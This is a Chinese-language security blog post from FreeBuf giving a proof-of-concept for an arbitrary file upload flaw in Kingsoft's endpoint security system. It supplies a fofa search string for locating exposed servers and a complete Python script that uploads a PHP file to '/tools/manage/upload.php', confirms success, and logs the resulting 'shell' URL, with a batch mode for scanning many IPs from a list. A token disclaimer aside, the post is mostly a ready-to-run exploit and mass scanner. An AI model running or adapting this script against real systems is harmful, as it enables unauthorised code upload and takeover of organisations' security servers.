金山终端安全系统任意文件上传漏洞附poc – 作者:阿刁123456

HW期间，为防范钓鱼，即日起FreeBuf将取消投稿文章的一切外部链接。给您带来的不便，敬请谅解~

fofa网址：fofa.so

fofa搜索：title=”金山终端安全”

随便点开一个，端口6868

poc验证存在漏洞，上传成功

python脚本：

import requests

headers = {
"Content-Type":"multipart/form-data;boundary=----WebKitFormBoundaryhQcaKJIKAnejKGru"
}

payload = '''------WebKitFormBoundaryhQcaKJIKAnejKGru
Content-Disposition: form-data; name="file";filename="21232f297a57a5a743894a0e4a801f13.php"
Content-Type: image/png

<?php phpinfo();?>
------WebKitFormBoundaryhQcaKJIKAnejKGru--'''


def multi():
    f = open("ips.txt", "r")
    path = "/tools/manage/upload.php"
    for ip in f.readlines():
        ip = ip.replace("\n", "")
        url = "http://{}{}".format(ip, path)
        f_exist = open("存在漏洞.txt", "a+")
        # print(url)
        try:
            res = requests.post(url=url, data=payload, headers=headers)
            # print(res.text)
            if res.text.find("File is valid, and was successfully uploaded") != -1:
                # print("upload success")
                file = "http://{}/Uploaddir/21232f297a57a5a743894a0e4a801f13.php".format(ip)
                print(file)
                f_exist.writelines(file)
                f_exist.writelines("\n")
            else:
                print("不存在此漏洞")
            f_exist.close()
        except Exception as e:
            print("请求异常-------", e.args)


def single():
    f_exist = open("存在漏洞.txt", "w+")
    path = "/tools/manage/upload.php"
    ip = input("目标ip = ")
    ip = ip.replace(" ","")
    url = "http://{}{}".format(ip, path)
    # print(url)
    try:
        res = requests.post(url=url, data=payload, headers=headers)
        # print(res.text)
        if res.text.find("File is valid, and was successfully uploaded") != -1:
            # print("upload success")
            file = "存在漏洞，shell:http://{}/Uploaddir/21232f297a57a5a743894a0e4a801f13.php".format(ip)
            print(file)
            f_exist.writelines(file)
            f_exist.writelines("\n")
        else:
            print("不存在此漏洞")
        f_exist.close()
    except Exception as e:
        print("请求异常-------",e.args)


if __name__ == '__main__':
    info = '''
****************************************
****************************************
****************************************
***请输入对应数字：                   ***
***1.针对单个url验证                  ***
***2.批量文本验证(ips.txt  每行eg:ip:port)
****************************************
****************************************
****************************************

'''
    select = input(info)
    info.replace(" ","")

    if 1==int(select):
        while(1):
            single()
    elif  2==int(select):
        multi()
    else:
        print("选项异常 ",select)

支持单个IP验证，支持批量扫描：

请勿用于非法用途。。。。

来源：freebuf.com 2021-04-10 09:15:50 by: 阿刁123456